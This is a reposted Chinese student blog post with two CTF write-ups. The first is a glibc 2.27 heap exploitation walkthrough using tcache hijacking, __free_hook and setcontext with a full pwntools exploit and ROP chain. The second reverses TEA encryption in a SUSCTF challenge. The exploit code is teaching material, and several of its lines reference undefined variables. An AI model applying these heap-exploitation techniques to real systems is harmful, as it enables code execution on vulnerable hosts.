2022年4月7日20:58:55评论277 views字数 14395阅读47分59秒阅读模式

皮蛋厂的学习日记系列为山东警察学院网安社成员日常学习分享，希望能与大家共同学习、共同进步~

2020级大能猫 | 跟上时代之高版本GLIBC下堆利用（一）

前言
故事的开始
原理
利用方法
利用场景
题目练习
高版本GLIBC-SETCONTEXT的变化
后记
参考链接：

2021级 Mu.Chen |从SUSCTF DigitalCircuits认识tea加密

脱
tea加密学习
解

pwn

2020级大能猫 | 跟上时代之高版本GLIBC下堆利用（一）

前言

文章首发自奇安信

越来越卷，只能这么说了，现在高版本下的利用方式越来越难，甚至有的比赛直接算是全部上kernel。然后新手小白感到这个年代的pwn手并不适合生存。算了，比赛是比赛，总之还是需要生活的。于是浏览了许多大佬的博客发现讲的并不是很详细于是想自己动手，在大佬给出利用调用链的基础下进行一个利用的详细讲解。大部分高版本的House系列现在都配上了现在比较主流的Largebin Attack以及Tcache Stashing Unlink Attack，还有setcontext的一些gadget的利用、由于很卷所以就有了一些沙箱的然后进行orw出flag。这样的话初步想法是本文先进行讲解setcontext的利用。在网上的资料讲解的不是很详细，起码对于我如此小白的人来说是非常难理解的，所以我想写下一篇比较详细的文章来讲解并且可以造福更多的人。

故事的开始

故事的开始是我在复现21年的国赛的时候，当时21年国赛的时候我们还没有怎么学pwn似乎是只会ret2text的样子。然后之前复现的时候发现这道题说了一句setcontex+58，我也不知是什么然后复现的时候只是跟着走。在之后的比赛里面也是找到了类似的东西似乎还是去学习一下比较好。

原理

首先讲解libc2.27下的setcontext吧

用ida打开libc-2.27.so找到setcontext函数，发现setcontext里面都是以rdi寄存器为索引向各种寄存器里面进行传输数值，如果我们能控制rdi的内容的话就会很轻松的控制其他寄存器。

皮蛋厂的学习日记 | 2022.04.07 跟上时代之高版本GLIBC下堆利用（一）& tea加密

至于我们前面提到的setcontext+53就是从rdi索引向各寄存器传输数值的那一行这样的话一直到结束我们就可以根基偏移布置好相应的数值控制各寄存器。我们在上面看到了rsp，这是非常关键的，如果控制了rsp也就是控制了栈。

还有我之前没有注意到的一个地方，是在__lifanxin大佬的博客中发现的：

修改rcx的值后接着有个push操作将rcx压栈，然后汇编指令按照顺序会执行截图中最后的retn操作，而retn的地址就是压入栈的rcx值，因此修改rcx就获得了控制程序流程的能力。

利用方法

利用方法的话就是利用我们熟悉的__free_hook还有__malloc_hook，就像我们平时利用这两个hook写og getshell的时候。我们一般来利用setcontext都是利用__free_hook进行调用因为free的参数是堆块，而malloc的参数是数字，这样的话使用free来的更快。

劫持栈地址

我们看到gadget中的rsp，是我们劫持栈的关键：

可见是将rdi+0xa0处的内容放入rsp寄存器，也可以这么理解。在可以执行setcontext的条件下，假如能够控制rdi+0xa地方的内容也就是有了控制rsp的能力，即控制栈的能力。

劫持返回地址

我们再看：

先是一段将rdi+0xe0的数据传递给rcx，下面又有一个将rcx压入栈的操作，再最后是有retn的，那么就相当于只要是控制rdi+0xe0就相当于控制了程序的执行流

利用场景

setcontext一般利用于需要绕过沙箱机制进行orw的时候，将程序流劫持到构造的orw链中去 ,构造的时候也比较方便只需要在rdi堆块下面固定偏移的范围内进行布置数据。（要找好偏移。

题目练习

题目：ciscn_2021_silverwolf

环境：ubuntu18.04

glibc版本：Ubuntu GLIBC 2.27-3ubuntu1.3

例行检查

64位全绿

这个版本没有doublefree的检测，增查删改，有uaf

利用思路

利用df泄露heap地址，再利用df将堆块申请到控制head，将其分配至unsortedbin中，然后show泄露libc地址。之后修改tcache的堆指针劫持freehook，还有其他大小堆块布置好相应堆块，利用setcontext进行调用执行orw

leak_heap_libc

这两个都是源自于lonlywolf的利用方式，这里放出过程

###############leak_heap
add(0x30)
delete()
edit("a"*0x10)
delete()
show()
heap = u64(ru("n").ljust(8, b"x00"))
heap_base = heap-0x1920
print("heap base: ", hex(heap_base))
#########hijack_tcache_head
head = heap_base+0x10
add(0x30)
edit(p64(head))
add(0x30)
add(0x30)
#############leak_libc
str = p64(0)*4+p64(0x00000000ff000000)
edit(str)
delete()
show()
libc = u64(ru("n").ljust(8, b"x00"))
libc_base = libc-0x70-libc.sym["__malloc_hook"]
setcontext = libc_base+libc.sym["setcontext"]+53
free_hook = libc_base+libc.sym["__free_hook"]
print("libc base: ", hex(libc_base))
print("setcontext_53: ", hex(setcontext))
print("free_hook: ", hex(free_hook))

构造orw

没啥说的，就是构造。

flag_addr = heap_base+0x2000

pop_rax_ret = base+0x000000000001ced0
pop_rdi_ret = base+0x000000000002144f
pop_rsi_ret = base+0x0000000000021e22
pop_rdx_ret = base+0x0000000000001b96
read = base+libc.sym["read"]
write = base+libc.sym["write"]
syscall = read_f+0xf#程序中找不到open，就利用系统调用

orw = p64(pop_rdi_ret)+p64(flag_addr)
orw += p64(pop_rsi_ret)+p64(0)
orw += p64(pop_rax_ret)+p64(2)
orw += p64(syscall)
orw += p64(pop_rdi_ret)+p64(3)
orw += p64(pop_rsi_ret)+p64(flag_addr)
orw += p64(pop_rdx_ret)+p64(0x30)
orw += p64(read_f)
orw += p64(pop_rdi_ret)+p64(1)
orw += p64(pop_rsi_ret)+p64(flag_addr)
orw += p64(pop_rdx_ret)+p64(0x30)
orw += p64(write_f)

根据setcontext进行构造

tcache_head

在进行布置的时候为了更好的去利用，官方的wp中hijack了tcache_perthread_struct，那么我们就看一下tcache_perthread_struct的结构：

typedef struct tcache_perthread_struct
{
  char counts[TCACHE_MAX_BINS];//数组长度64，每个元素最大为0x7，仅占用一个字节（对应64个tcache链表）
  tcache_entry *entries[TCACHE_MAX_BINS];//entries指针数组（对应64个tcache链表，cache bin中最大为0x400字节
  //每一个指针指向的是对应tcache_entry结构体的地址。
} tcache_perthread_struct;

我们看到上面的结构体里面，在counts之后存在tcache链的指针，指向每一个大小的tcache链的下一个堆块的fd。也就是意味着我们只要劫持了这里的指针我们就能实现任意地址分配堆块。这里的布置利用的就是这个结构体中的指针。

布置

在布置的时候我们可以选择一个堆块为参数，就是以这个堆块的地址作为rdi，布置数据要根据此参数作为索引。

首先我们要先把堆块分配到tcache_entry的位置

add(0x48)
edit(p64(0)*9)
for i in range(5):
    add(0x10)
add(0x18)
edit(p64(heap_base+0x50))#修改tcache的fd指针到tcache_entry
add(0x38)#申请到tcache_entry

剩下的就是对tcache_entry中的指针进行布置了

orw_addr = heap_base+0x1000#挑个纯净的环境放置orw链

payload = p64(free_hook)#这里是0x20大小堆块的下一个堆块的指针，意味着我们再申请一个0x20大小的堆块就分配到了free_hook
payload += p64(heap_base+0x2000)#这里是0x30大小堆块的下一个堆块的指针,这是作为rdi的堆块
payload += p64(heap_base+0x20A0)#rdi+0xa0这里布置的应该是需要劫持的栈地址
payload += p64(heap_base+0x2000)#0x50
payload += p64(orw_addr+0x60) + p64(orw_addr)#0x60和0x70放我们的prw链，因为比较长所以需要放两个堆块
payload += p64(0)
edit(payload)#写入

下面就是着手要实施了

add(0x10)
edit(p64(setcontext))#劫持free_hook修改为free_hook

add(0x20)
edit("./flagx00")#作为filename

add(0x30)
pl = p64(orw_addr) + p64(pop_rdi_ret+1)#用来控制rsp
edit(pl)

add(0x60)
edit(orw[:0x60])
add(0x50)
edit(orw[0x60:])#布置上orw链

delete()#触发

完整EXP

#encoding = utf-8
import os
import sys
import time
from pwn import *
from LibcSearcher import * 

context.log_level = "debug"
context.os = 'linux'
context.arch = 'amd64'

binary = "silverwolf"
libcelf = "libc-2.27.so"
ip = ""
port = ""
local = 1
arm = 0
core = 64

og = [0x4342,0x3342]

s       = lambda data               :p.send(str(data))
sa      = lambda delim,data         :p.sendafter(str(delim), str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda delim,data         :p.sendlineafter(str(delim), str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda delims, drop=True  :p.recvuntil(delims, drop)
itr     = lambda                    :p.interactive()
uu32    = lambda data               :u32(data.ljust(4,'x00'))
uu64    = lambda data               :u64(data.ljust(8,'x00'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))

if(local==1):
    if(arm==1):
        if(core==64):
            p = process(["qemu-arm", "-g", "1212", "-L", "/usr/arm-linux-gnueabi",binary])
        if(core==32):
            p = process(["qemu-aarch64", "-g", "1212", "-L", "/usr/aarch64-linux-gnu/", binary])
    else:
        p = process(binary)
else:
    p = remote(ip,port)

elf = ELF(binary)
libc = ELF(libcelf)

def choice(cho):
    sla('Your choice: ',cho)

def add(size):
    choice(1)
    sla('Index: ','0')
    sla('Size: ',size)

def delete():
    choice(4)
    sla('Index: ','0')

def show():
    choice(3)
    sla('Index: ','0')

def edit(content):
    choice(2)
    sla('Index: ','0')
    sla('Content: ',content) 

def pwn():
    add(0x30)
    delete()
    edit("a"*0x10)
    delete()
    show()
    heap = u64(ru("n").ljust(8, b"x00"))
    heap_base = heap-0x1920
    print("heap base: ", hex(heap_base))

    head = heap_base+0x10
    add(0x30)
    edit(p64(head))
    add(0x30)
    add(0x30)

    str = p64(0)*4+p64(0x00000000ff000000)
    edit(str)
    delete()
    show()
    libc = u64(ru("n").ljust(8, b"x00"))
    libc_base = libc-0x70-libc.sym["__malloc_hook"]
    setcontext = libc_base+libc.sym["setcontext"]+53
    free_hook = libc_base+libc.sym["__free_hook"]
    print("libc base: ", hex(libc_base))
    print("setcontext_53: ", hex(setcontext))
    print("free_hook: ", hex(free_hook))

    flag_addr = heap_base+0x2000

    pop_rax_ret = base+0x000000000001ced0
    pop_rdi_ret = base+0x000000000002144f
    pop_rsi_ret = base+0x0000000000021e22
    pop_rdx_ret = base+0x0000000000001b96
    read = base+libc.sym["read"]
    write = base+libc.sym["write"]
    syscall = read_f+0xf

    orw = p64(pop_rdi_ret)+p64(flag_addr)
    orw += p64(pop_rsi_ret)+p64(0)
    orw += p64(pop_rax_ret)+p64(2)
    orw += p64(syscall)
    orw += p64(pop_rdi_ret)+p64(3)
    orw += p64(pop_rsi_ret)+p64(flag_addr)
    orw += p64(pop_rdx_ret)+p64(0x30)
    orw += p64(read_f)
    orw += p64(pop_rdi_ret)+p64(1)
    orw += p64(pop_rsi_ret)+p64(flag_addr)
    orw += p64(pop_rdx_ret)+p64(0x30)
    orw += p64(write_f)

    add(0x48)
    edit(p64(0)*9)
    for i in range(5):
        add(0x10)
    add(0x18)
    edit(p64(heap_base+0x50))
    add(0x38)

    orw_addr = heap_base+0x1000

    payload = p64(free_hook)
    payload += p64(heap_base+0x2000)
    payload += p64(heap_base+0x20A0)
    payload += p64(heap_base+0x2000)
    payload += p64(orw_addr+0x60) + p64(orw_addr)
    payload += p64(0)
    edit(payload)

    add(0x10)
    edit(p64(setcontext))

    add(0x20)
    edit("./flagx00")

    add(0x30)
    pl = p64(orw_addr) + p64(pop_rdi_ret+1)
    edit(pl)

    add(0x60)
    edit(orw[:0x60])
    add(0x50)
    edit(orw[0x60:])

    delete()
    itr()

#爆破
'''
i = 0
while 1:
    i += 1
    log.warn(str(i))
    try:  
        pwn()
    except Exception:
        p.close()
        if(local == 1):
            p = process(binary)
        else:
            p = remote(ip,port)
        continue
'''

if __name__ == '__main__':
    pwn()

高版本GLIBC-SETCONTEXT的变化

在GLIBC版本为2.29开始，setcontext的索引就从rdi改成了rdx

如图：

如果我们按照之前的思路的话，需要我们先通过ROP控制RDX的值。众所周知利用gadget控制rdx的寄存器比较困难。那么这样的话我们需要找到一些比较方便的gadget去间接控制rdx寄存器。

gadget

第一个是getkeyserv_handle+576

可以通过这个gadget通过rdi来控制rdx寄存器（适用版本为Glibc2.29到2.32

mov     rdx, [rdi+8]
mov     [rsp+0C8h+var_C8], rax
call    qword ptr [rdx+20h]

后记

总结下利用的方法来巩固自己的知识，也希望能帮助到像我一样迷茫的人。如有错误请斧正。

参考链接：

(9条消息) pwn题堆利用的一些姿势 -- setcontext___lifanxin的博客-CSDN博客

(9条消息) 2021第十四届全国大学生信息安全竞赛WP（CISCN）-- pwn部分___lifanxin的博客-CSDN博客_信息安全国赛

(9条消息) tcache的利用方法_qq_39869547的博客-CSDN博客_tcache

PWN堆溢出技巧：ORW的解题手法与万金油Gadgets - 安全客，安全资讯平台 (anquanke.com)

RE

2021级 Mu.Chen |从SUSCTF DigitalCircuits认识tea加密

脱

附件一看图标就知道是python写的程序，常规方法脱一遍

脱出python文件如下：

import time

def f1(a, b):
    if a == '1':
        if b == '1':
            return '1'
    return '0'


def f2(a, b):
    if a == '0':
        if b == '0':
            return '0'
    return '1'


def f3(a):
    if a == '1':
        return '0'
    if a == '0':
        return '1'


def f4(a, b):
    return f2(f1(a, f3(b)), f1(f3(a), b))


def f5(x, y, z):
    s = f4(f4(x, y), z)
    c = f2(f1(x, y), f1(z, f2(x, y)))
    return (s, c)


def f6(a, b):
    ans = ''
    z = '0'
    a = a[::-1]
    b = b[::-1]
    for i in range(32):
        ans += f5(a[i], b[i], z)[0]
        z = f5(a[i], b[i], z)[1]

    return ans[::-1]


def f7(a, n):
    return a[n:] + '0' * n


def f8(a, n):
    return n * '0' + a[:-n]


def f9(a, b):
    ans = ''
    for i in range(32):
        ans += f4(a[i], b[i])

    return ans


def f10(v0, v1, k0, k1, k2, k3):
    s = '00000000000000000000000000000000'
    d = '10011110001101110111100110111001'
    for i in range(32):
        s = f6(s, d)
        v0 = f6(v0, f9(f9(f6(f7(v1, 4), k0), f6(v1, s)), f6(f8(v1, 5), k1)))
        v1 = f6(v1, f9(f9(f6(f7(v0, 4), k2), f6(v0, s)), f6(f8(v0, 5), k3)))

    return v0 + v1


k0 = '0100010001000101'.zfill(32)
k1 = '0100000101000100'.zfill(32)
k2 = '0100001001000101'.zfill(32)
k3 = '0100010101000110'.zfill(32)
flag = input('please input flag:')
if flag[0:7] != 'SUSCTF{' or flag[(-1)] != '}':
    print('Error!!!The formate of flag is SUSCTF{XXX}')
    time.sleep(5)
    exit(0)
flagstr = flag[7:-1]
if len(flagstr) != 24:
    print('Error!!!The length of flag 24')
    time.sleep(5)
    exit(0)
else:
    res = ''
    for i in range(0, len(flagstr), 8):
        v0 = flagstr[i:i + 4]
        v0 = bin(ord(flagstr[i]))[2:].zfill(8) + bin(ord(flagstr[(i + 1)]))[2:].zfill(8) + bin(ord(flagstr[(i + 2)]))[2:].zfill(8) + bin(ord(flagstr[(i + 3)]))[2:].zfill(8)
        v1 = bin(ord(flagstr[(i + 4)]))[2:].zfill(8) + bin(ord(flagstr[(i + 5)]))[2:].zfill(8) + bin(ord(flagstr[(i + 6)]))[2:].zfill(8) + bin(ord(flagstr[(i + 7)]))[2:].zfill(8)
        res += f10(v0, v1, k0, k1, k2, k3)

    if res == '001111101000100101000111110010111100110010010100010001100011100100110001001101011000001110001000001110110000101101101000100100111101101001100010011100110110000100111011001011100110010000100111':
        print('True')
    else:
        print('False')
time.sleep(5)

在不认识tea加密的情况下怎么判断它是什么呢？

我的方法是上CSDN搜

好了，我们现在知道这题是tea加密了，那么就来好好学习一下这种密码

tea加密学习

概述

TEA算法全称微型加密算法（Tiny Encryption Algorithm）是一种简单容易实现的加密算法，是由剑桥大学计算机实验室的David Wheeler和Roger Needham于1994年发明。

其本质上是一种分组密码，其加密过程中需要使用2个32位无符号整数，即明文密文块长64比特，密钥长度为128比特，也就是4个32位无符号整数。

加密过程

加密过程中一共使用5个量进行运算，l和r是两个32位的无符号整数，sum=0，delta给定一个定值，以及密钥key

sum+=delta;
l += ((r << 4) + key[0]) ^ (r + sum) ^ ((r >> 5) + key[1]);
r += ((l << 4) + key[2]) ^ (l + sum) ^ ((l >> 5) + key[3]);

总共要进行64轮的迭代

算法实现

#include <stdio.h>  
#include <stdint.h>  

//加密函数  
void encrypt (uint32_t* v, uint32_t* k) {  
    uint32_t v0=v[0], v1=v[1], sum=0, i;           /* set up */  
    uint32_t delta=0x9e3779b9;                     /* a key schedule constant */  
    uint32_t k0=k[0], k1=k[1], k2=k[2], k3=k[3];   /* cache key */  
    for (i=0; i < 32; i++) {                       /* basic cycle start */  
        sum += delta;  
        v0 += ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1);  
        v1 += ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3);  
    }                                              /* end cycle */  
    v[0]=v0; v[1]=v1;  
}  
//解密函数  
void decrypt (uint32_t* v, uint32_t* k) {  
    uint32_t v0=v[0], v1=v[1], sum=0xC6EF3720, i;  /* set up */  
    uint32_t delta=0x9e3779b9;                     /* a key schedule constant */  
    uint32_t k0=k[0], k1=k[1], k2=k[2], k3=k[3];   /* cache key */  
    for (i=0; i<32; i++) {                         /* basic cycle start */  
        v1 -= ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3);  
        v0 -= ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1);  
        sum -= delta;  
    }                                              /* end cycle */  
    v[0]=v0; v[1]=v1;  
}  

int main()  
{  
    uint32_t v[2]={1,2},k[4]={2,2,3,4};  
    // v为要加密的数据是两个32位无符号整数  
    // k为加密解密密钥，为4个32位无符号整数，即密钥长度为128位  
    printf("加密前原始数据：%u %un",v[0],v[1]);  
    encrypt(v, k);  
    printf("加密后的数据：%u %un",v[0],v[1]);  
    decrypt(v, k);  
    printf("解密后的数据：%u %un",v[0],v[1]);  
    return 0;  
}

解

在刚刚解出来的的脚本之中，我们到明文和密钥

res = '001111101000100101000111110010111100110010010100010001100011100100110001001101011000001110001000001110110000101101101000100100111101101001100010011100110110000100111011001011100110010000100111'
k0 = '0100010001000101'
k1 = '0100000101000100'
k2 = '0100001001000101'
k3 = '0100010101000110'

明文过长，数起来太麻烦，直接给它转化成16进制，并对其进行分组

0x3e8947cb 0x31358388 0xda627361
0xcc944639 0x3b0b6893 0x3b2e6427

由于对c语言和c++掌握得并不熟练，就在网上找个了模板，用尽了毕生所学把明文和key填了进去

exp：

#include <stdio.h>  
#include <stdint.h>  

uint32_t key[4] = { 0b0100010001000101,0b0100000101000100 ,0b0100001001000101,0b0100010101000110 };

void decrypt(uint32_t v0, uint32_t v1)
{
    uint32_t index = 0x9e3779b9;
    uint32_t sum = index * 32;
    for (int i = 0; i < 32; i++)
    {
        v1 -= ((((v0 << 4) + key[2]) ^ (v0 + sum)) ^ ((v0 >> 5) + key[3]));
        v0 -= ((((v1 << 4) + key[0]) ^ (v1 + sum)) ^ ((v1 >> 5) + key[1]));
        sum -= index;
    }
    printf("%x", v0);
    printf("%x", v1);
}


int main()
{
    uint32_t v1[3] = { 0x3e8947cb ,0x31358388 ,0xda627361 };
    uint32_t v2[3] = { 0xcc944639 ,0x3b0b6893 ,0x3b2e6427 };
    for (int i = 0; i < 3; i++)
        decrypt(v1[i], v2[i]);
    return 0;
}

跑出来的16进制数组并不是最终的flag，回到python里转成字符串才是。

还是python好用，c和c++快把我整哭了。

原文始发于微信公众号（山警网络空间安全实验室）：皮蛋厂的学习日记 | 2022.04.07 跟上时代之高版本GLIBC下堆利用（一）& tea加密

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

pwn

2020级 大能猫 | 跟上时代之高版本GLIBC下堆利用（一）

前言